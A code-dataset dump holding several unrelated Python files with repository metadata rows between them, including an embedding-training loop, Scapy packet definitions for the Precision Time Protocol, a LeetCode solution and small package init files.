try_count = 0
while try_count < max_try:
try:
embeddings, loss_history, time_history, embed_distances, jac = train(
node_pairs, obj_distances, embedding_type='Wass', embed_dim=embed_dim,
learning_rate=0.001, n_epochs=n_epochs, ground_dim=2, nodes=num_nodes, batch_size=batch_size)
break
except RuntimeError:
logging.warning("Got loss NaN")
try_count += 1
else:
logging.warning("Fail.")
if normalize_distance:
embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'WassR2', embed_dim))
np.savez('./results/{}_{}_{}_batch'.format(file_name, 'WassR2', embed_dim),
embeddings=embeddings, loss=loss_history, time=time_history,
embed_distances=embed_distances)
# KL
logging.info("Running KL embedding, embed dim={}".format(embed_dim))
try_count = 0
while try_count < max_try:
try:
embeddings, loss_history, time_history, embed_distances, jac = train(
node_pairs, obj_distances, embedding_type='KL', embed_dim=embed_dim,
learning_rate=0.01, n_epochs=n_epochs, nodes=num_nodes, batch_size=batch_size)
break
except RuntimeError:
logging.warning("Got loss NaN")
try_count += 1
else:
logging.warning("Fail.")
if normalize_distance:
embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'KL', embed_dim))
np.savez('./results/{}_{}_{}_batch'.format(file_name, 'KL', embed_dim),
embeddings=embeddings, loss=loss_history, time=time_history,
embed_distances=embed_distances)
# Euclidean
logging.info("Running Euclidean embedding, embed dim={}".format(embed_dim))
try_count = 0
while try_count < max_try:
try:
embeddings, loss_history, time_history, embed_distances, jac = train(
node_pairs, obj_distances, embedding_type='Euc', embed_dim=embed_dim,
learning_rate=0.001, n_epochs=n_epochs, nodes=num_nodes, batch_size=batch_size)
break
except RuntimeError:
logging.warning("Got loss NaN")
try_count += 1
else:
logging.warning("Fail.")
if normalize_distance:
embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'Euclidean', embed_dim))
np.savez('./results/{}_{}_{}_batch'.format(file_name, 'Euclidean', embed_dim),
embeddings=embeddings, loss=loss_history, time=time_history,
embed_distances=embed_distances)
# Hyperbolic
logging.info("Running Hyperbolic embedding, embed dim={}".format(embed_dim))
try_count = 0
while try_count < max_try:
try:
embeddings, loss_history, time_history, embed_distances, jac = train(
node_pairs, obj_distances, embedding_type='Hyper', embed_dim=embed_dim,
learning_rate=0.00005, n_epochs=n_epochs, nodes=num_nodes, batch_size=batch_size)
break
except RuntimeError:
logging.warning("Got loss NaN")
try_count += 1
else:
logging.warning("Fail.")
if normalize_distance:
embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'Hyperbolic', embed_dim))
np.savez('./results/{}_{}_{}_batch'.format(file_name, 'Hyperbolic', embed_dim),
embeddings=embeddings, loss=loss_history, time=time_history,
embed_distances=embed_distances)
# # Wass R3
# logging.info("Running Wasserstein R3 embedding, embed dim={}".format(embed_dim))
# try_count = 0
# while try_count < max_try:
# try:
# embeddings, loss_history, time_history, embed_distances, jac = train(
# node_pairs, obj_distances, embedding_type='Wass', embed_dim=embed_dim,
# learning_rate=0.001, n_epochs=n_epochs, ground_dim=3, nodes=num_nodes, batch_size=batch_size)
# break
# except RuntimeError:
# logging.warning("Got loss NaN")
# try_count += 1
# else:
# logging.warning("Fail.")
# if normalize_distance:
# embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
# logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'WassR3', embed_dim))
# np.savez('./results/{}_{}_{}_batch'.format(file_name, 'WassR3', embed_dim),
# embeddings=embeddings, loss=loss_history, time=time_history,
# embed_distances=embed_distances)
# # Wass R4
# logging.info("Running Wasserstein R4 embedding, embed dim={}".format(embed_dim))
# try_count = 0
# while try_count < max_try:
# try:
# embeddings, loss_history, time_history, embed_distances, jac = train(
# node_pairs, obj_distances, embedding_type='Wass', embed_dim=embed_dim,
# learning_rate=0.001, n_epochs=n_epochs, ground_dim=4, nodes=num_nodes, batch_size=batch_size)
# break
# except RuntimeError:
# logging.warning("Got loss NaN")
# try_count += 1
# else:
# logging.warning("Fail.")
# if normalize_distance:
# embed_distances = (embed_distances - distance_adjustment) * (obj_max - obj_min) + obj_min
# logging.info("Writing {}_{}_{}_batch to local file".format(file_name, 'WassR4', embed_dim))
# np.savez('./results/{}_{}_{}_batch'.format(file_name, 'WassR4', embed_dim),
# embeddings=embeddings, loss=loss_history, time=time_history,
# embed_distances=embed_distances)
| 43.357143 | 111 | 0.662685 | 916 | 7,284 | 4.956332 | 0.122271 | 0.065198 | 0.039648 | 0.066079 | 0.813436 | 0.788767 | 0.771586 | 0.758811 | 0.758811 | 0.704626 | 0 | 0.011636 | 0.221307 | 7,284 | 167 | 112 | 43.616766 | 0.788787 | 0.260708 | 0 | 0.552381 | 0 | 0 | 0.132284 | 0.02492 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
622916e739637a1f160999cffcb577b6be273cba | 22 | py | Python | mercy/utils/__init__.py | monokrome/mercy | 8274be29e66297ef1e718cd8de9b3993bf878a76 | [
"BSD-3-Clause"
] | null | null | null | mercy/utils/__init__.py | monokrome/mercy | 8274be29e66297ef1e718cd8de9b3993bf878a76 | [
"BSD-3-Clause"
] | null | null | null | mercy/utils/__init__.py | monokrome/mercy | 8274be29e66297ef1e718cd8de9b3993bf878a76 | [
"BSD-3-Clause"
] | null | null | null | from . import objects
| 11 | 21 | 0.772727 | 3 | 22 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 22 | 1 | 22 | 22 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6555535ba14dc4c2849554f46164bbaf35276415 | 101 | py | Python | CH8_trees/type_hints_test.py | B-T-D/DSAP | 427da326373d3e197c54c0ce291b588e2dea67a2 | [
"CNRI-Python"
] | 1 | 2022-02-07T15:54:30.000Z | 2022-02-07T15:54:30.000Z | CH8_trees/type_hints_test.py | B-T-D/DSAP | 427da326373d3e197c54c0ce291b588e2dea67a2 | [
"CNRI-Python"
] | null | null | null | CH8_trees/type_hints_test.py | B-T-D/DSAP | 427da326373d3e197c54c0ce291b588e2dea67a2 | [
"CNRI-Python"
] | 1 | 2021-04-27T14:02:40.000Z | 2021-04-27T14:02:40.000Z | def double(x: int=4):
return x * 2
print(double())
print(double(3))
# confirmed correct syntax
| 12.625 | 26 | 0.663366 | 16 | 101 | 4.1875 | 0.75 | 0.328358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036585 | 0.188119 | 101 | 7 | 27 | 14.428571 | 0.780488 | 0.237624 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0.25 | 0.5 | 0.5 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
658d2d27417a464531cf4a4c9af619515137783b | 293 | py | Python | toontown/cogdominium/DistCogdoGameBase.py | LittleNed/toontown-stride | 1252a8f9a8816c1810106006d09c8bdfe6ad1e57 | [
"Apache-2.0"
] | 3 | 2020-01-02T08:43:36.000Z | 2020-07-05T08:59:02.000Z | toontown/cogdominium/DistCogdoGameBase.py | NoraTT/Historical-Commits-Project-Altis-Source | fe88e6d07edf418f7de6ad5b3d9ecb3d0d285179 | [
"Apache-2.0"
] | null | null | null | toontown/cogdominium/DistCogdoGameBase.py | NoraTT/Historical-Commits-Project-Altis-Source | fe88e6d07edf418f7de6ad5b3d9ecb3d0d285179 | [
"Apache-2.0"
] | 4 | 2019-06-20T23:45:23.000Z | 2020-10-14T20:30:15.000Z |
class DistCogdoGameBase:
def local2GameTime(self, timestamp):
return timestamp - self._startTime
def game2LocalTime(self, timestamp):
return timestamp + self._startTime
def getCurrentGameTime(self):
return self.local2GameTime(globalClock.getFrameTime()) | 26.636364 | 62 | 0.723549 | 26 | 293 | 8.076923 | 0.461538 | 0.12381 | 0.180952 | 0.266667 | 0.419048 | 0.419048 | 0.419048 | 0 | 0 | 0 | 0 | 0.012821 | 0.201365 | 293 | 11 | 62 | 26.636364 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.428571 | false | 0 | 0 | 0.428571 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
02b818febef4bd058845e7d71c9a5f17c5bd3193 | 11,226 | py | Python | p4gen/ptp_base.py | jiru000000/p4benchmark | 9e4f4628a630d7a0f572e3ab5b41662f588251d6 | [
"Apache-2.0"
] | null | null | null | p4gen/ptp_base.py | jiru000000/p4benchmark | 9e4f4628a630d7a0f572e3ab5b41662f588251d6 | [
"Apache-2.0"
] | null | null | null | p4gen/ptp_base.py | jiru000000/p4benchmark | 9e4f4628a630d7a0f572e3ab5b41662f588251d6 | [
"Apache-2.0"
] | 1 | 2021-06-04T09:41:08.000Z | 2021-06-04T09:41:08.000Z | from scapy.fields import BitEnumField, \
BitField, \
ByteField, \
IntField, \
ConditionalField, \
FlagsField, \
LongField, \
XShortField, \
ShortField, \
SignedByteField, \
XBitField, \
XByteField, \
XIntField, \
XStrFixedLenField
from scapy.packet import Packet
class Sync(Packet):
"""Precision Time Protocol"""
name = "PTP protocol Sync"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x0, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 44),
ByteField("domainNumber", 0),
XByteField("reserved1", 255),
FlagsField("flags", 0x0000, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0x9E48),
XByteField("control", 0x05),
SignedByteField("logMessageInterval", 0x0F),
# Sync
BitField("originTimestamp", 0x000045B111510472F9C1, 80)
]
class DelayReq(Packet):
"""Precision Time Protocol"""
name = "PTP protocol"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x1, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 44),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# DelayReq
BitField("originTimestamp", 100, 80)
]
class PdelayReq(Packet):
"""Precision Time Protocol"""
name = "PTP protocol PdelayReq"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x2, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 54),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# PdelayReq
BitField("originTimestamp", 0, 80),
BitField("reserved3", 10000, 80)
]
class PdelayResp(Packet):
"""Precision Time Protocol"""
name = "PTP protocol PdelayResp"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x3, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 54),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# PdelayResp
BitField("requestReceiptTimestamp", 10000000, 80),
BitField("requestingPortIdentity", 10000000, 80),
]
class FollowUp(Packet):
"""Precision Time Protocol"""
name = "PTP protocol FollowUp"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x8, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 44),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# FollowUp
BitField('preciseOriginTimestamp', 0x888, 80),
]
class DelayResp(Packet):
"""Precision Time Protocol"""
name = "PTP protocol DelayResp"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0x9, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 54),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# DelayResp
BitField("receiveTimestamp", 10000000, 80),
BitField("requestingPortIdentity", 100, 80)
]
class PdelayRespFollowUp(Packet):
"""Precision Time Protocol"""
name = "PTP protocol PdelayRespFollowUp"
MSG_TYPES = {
0x0: "Sync",
0x1: "DelayReq",
0x2: "PdelayReq",
0x3: "PdelayResp",
0x8: "FollowUp",
0x9: "DelayResp",
0xA: "PdelayRespFollowUp"
}
FLAGS = [
"SECURITY", "profileSpecific2", "profileSpecific1", "?",
"?", "UNICAST", "TWO_STEP", "ALTERNATE_MASTER",
"?", "?","FREQUENCY_TRACEABLE","TIME_TRACEABLE",
"TIMESCALE", "UTC_REASONABLE", "LI59", "LI61"
]
fields_desc = [
BitField("transportSpecific", 1, 4),
BitEnumField("messageType", 0xA, 4, MSG_TYPES),
XBitField("reserved0", 0, 4),
BitField("versionPTP", 0x2, 4),
ShortField("messageLength", 54),
ByteField("domainNumber", 0),
XByteField("reserved1", 0),
FlagsField("flags", 0x0200, 16, FLAGS),
LongField("correctionField", 0),
XIntField("reserved2", 0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
#BitField('clockIdentity', 0x888, 64),
#BitField('sourcePortIdentity', 10000, 16),
ShortField("sequenceId", 0),
XByteField("control", 0),
SignedByteField("logMessageInterval", 0),
# PdelayRespFollowUp
BitField("responseOriginTimestamp", 10000000, 80),
BitField("requestingPortIdentity", 10000000, 80),
]
class PTP(Packet):
"""Precision Time Protocol"""
name = "PTP protocol"
fields_desc = [
XBitField('transportSpecific', 0x1, 4),
XBitField('messageType', 0x0, 4),
XBitField('reserved0', 0x2, 4),
XBitField('versionPTP', 0x2, 4),
ShortField('messageLength', 0x2C),
XBitField('domainNumber', 0x0, 8),
XBitField('reserved1', 0x1, 8),
ShortField('flags', 0x0),
XBitField('correction', 0x0, 64),
IntField('reserved2', 0x0),
XBitField('sourcePortIdentity', 0x008063FFFF0009BA, 80),
ShortField('sequenceId', 0x9E48),
XBitField('PTPcontrol', 0x05, 8),
XBitField('logMessagePeriod', 0x0F, 8),
XBitField('originTimestamp', 0x000045B111510472F9C1, 80)
]
| 31.622535 | 64 | 0.561286 | 875 | 11,226 | 7.136 | 0.118857 | 0.017937 | 0.024343 | 0.034593 | 0.806374 | 0.800448 | 0.800448 | 0.72902 | 0.72902 | 0.72902 | 0 | 0.08742 | 0.289774 | 11,226 | 354 | 65 | 31.711864 | 0.695723 | 0.072867 | 0 | 0.688406 | 0 | 0 | 0.300986 | 0.012952 | 0 | 0 | 0.046685 | 0 | 0 | 1 | 0 | false | 0 | 0.007246 | 0 | 0.144928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
02de16e29605f5a1daa10d952ea002a4f013143b | 47 | py | Python | __init__.py | GPaolo/SERENE | 83bc38a37ad8f1be9695d2483fd463428d4dae23 | [
"MIT"
] | 3 | 2021-04-19T21:55:00.000Z | 2021-12-20T15:26:12.000Z | __init__.py | GPaolo/SERENE | 83bc38a37ad8f1be9695d2483fd463428d4dae23 | [
"MIT"
] | null | null | null | __init__.py | GPaolo/SERENE | 83bc38a37ad8f1be9695d2483fd463428d4dae23 | [
"MIT"
] | null | null | null | # Created by Giuseppe Paolo
# Date: 27/07/2020 | 23.5 | 28 | 0.723404 | 8 | 47 | 4.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 0.170213 | 47 | 2 | 29 | 23.5 | 0.666667 | 0.914894 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b8232813dcb83e39ca973743933c60beeb43a867 | 206 | py | Python | codes_/0405_Convert_a_Number_to_Hexadecimal.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0405_Convert_a_Number_to_Hexadecimal.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | codes_/0405_Convert_a_Number_to_Hexadecimal.py | SaitoTsutomu/leetcode | 4656d66ab721a5c7bc59890db9a2331c6823b2bf | [
"MIT"
] | null | null | null | # %% [405. Convert a Number to Hexadecimal](https://leetcode.com/problems/convert-a-number-to-hexadecimal/)
class Solution:
def toHex(self, num: int) -> str:
return hex(num & (2 ** 32 - 1))[2:]
| 41.2 | 107 | 0.640777 | 30 | 206 | 4.4 | 0.766667 | 0.121212 | 0.212121 | 0.242424 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047059 | 0.174757 | 206 | 4 | 108 | 51.5 | 0.729412 | 0.509709 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0 | 0.333333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
b82e3d0ae7d612c7601d575c83a3600914225bdb | 29 | py | Python | gva/data/formats/__init__.py | gva-jjoyce/gva_data | cda990d0abb4b175025aaf16e75192bd9cc213af | [
"Apache-2.0"
] | null | null | null | gva/data/formats/__init__.py | gva-jjoyce/gva_data | cda990d0abb4b175025aaf16e75192bd9cc213af | [
"Apache-2.0"
] | 24 | 2020-12-24T12:21:42.000Z | 2021-01-28T14:22:38.000Z | gva/data/formats/__init__.py | gva-jjoyce/gva_data | cda990d0abb4b175025aaf16e75192bd9cc213af | [
"Apache-2.0"
] | null | null | null | from .group_by import Groups
| 14.5 | 28 | 0.827586 | 5 | 29 | 4.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 29 | 1 | 29 | 29 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b853f3fb8076032159e18ff8756b360d2904f2ad | 30 | py | Python | act3.py | hummusM/cs3240-labdemo | f96d71caabf44e10321e0831442bc3263bfedbd0 | [
"MIT"
] | null | null | null | act3.py | hummusM/cs3240-labdemo | f96d71caabf44e10321e0831442bc3263bfedbd0 | [
"MIT"
] | null | null | null | act3.py | hummusM/cs3240-labdemo | f96d71caabf44e10321e0831442bc3263bfedbd0 | [
"MIT"
] | null | null | null |
print ("I am trying part 3.") | 15 | 29 | 0.633333 | 6 | 30 | 3.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.041667 | 0.2 | 30 | 2 | 29 | 15 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0.633333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
b87cb3bdaeac134027ad869cc9067e4eb3c2d627 | 20 | py | Python | tests/__init__.py | bitsf/load-m3u8 | f1b9ac875bbd4be625adf9303fe112b2f02af68e | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | bitsf/load-m3u8 | f1b9ac875bbd4be625adf9303fe112b2f02af68e | [
"Apache-2.0"
] | null | null | null | tests/__init__.py | bitsf/load-m3u8 | f1b9ac875bbd4be625adf9303fe112b2f02af68e | [
"Apache-2.0"
] | null | null | null | # _*_coding:utf-8_*_ | 20 | 20 | 0.7 | 3 | 20 | 3.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052632 | 0.05 | 20 | 1 | 20 | 20 | 0.473684 | 0.9 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b885c3edef9aa23aeaa2cd623011541f4af58c37 | 48 | py | Python | src/aves/models/network/__init__.py | sergioangulo/aves | 43a14ec9c82929136a39590b15fe7f92182aae20 | [
"CC-BY-3.0"
] | 34 | 2020-10-23T08:57:03.000Z | 2022-03-23T17:07:20.000Z | src/aves/models/network/__init__.py | sergioangulo/aves | 43a14ec9c82929136a39590b15fe7f92182aae20 | [
"CC-BY-3.0"
] | 3 | 2021-12-02T22:42:25.000Z | 2021-12-10T02:37:01.000Z | src/aves/models/network/__init__.py | sergioangulo/aves | 43a14ec9c82929136a39590b15fe7f92182aae20 | [
"CC-BY-3.0"
] | 11 | 2021-03-25T02:40:34.000Z | 2022-01-03T22:41:29.000Z | from .base import Network
from .edge import Edge | 24 | 25 | 0.8125 | 8 | 48 | 4.875 | 0.625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145833 | 48 | 2 | 26 | 24 | 0.95122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b895018e5389ab1b02cd0bba6ca315a7ffc7558b | 32 | py | Python | transform/__init__.py | vmproj/conformer-vc | 224d330692cf3245c805bbf78c3e58a7805126d1 | [
"MIT"
] | 1 | 2022-01-24T05:43:13.000Z | 2022-01-24T05:43:13.000Z | transform/__init__.py | vmproj/conformer-vc | 224d330692cf3245c805bbf78c3e58a7805126d1 | [
"MIT"
] | null | null | null | transform/__init__.py | vmproj/conformer-vc | 224d330692cf3245c805bbf78c3e58a7805126d1 | [
"MIT"
] | null | null | null | from .audio import TacotronSTFT
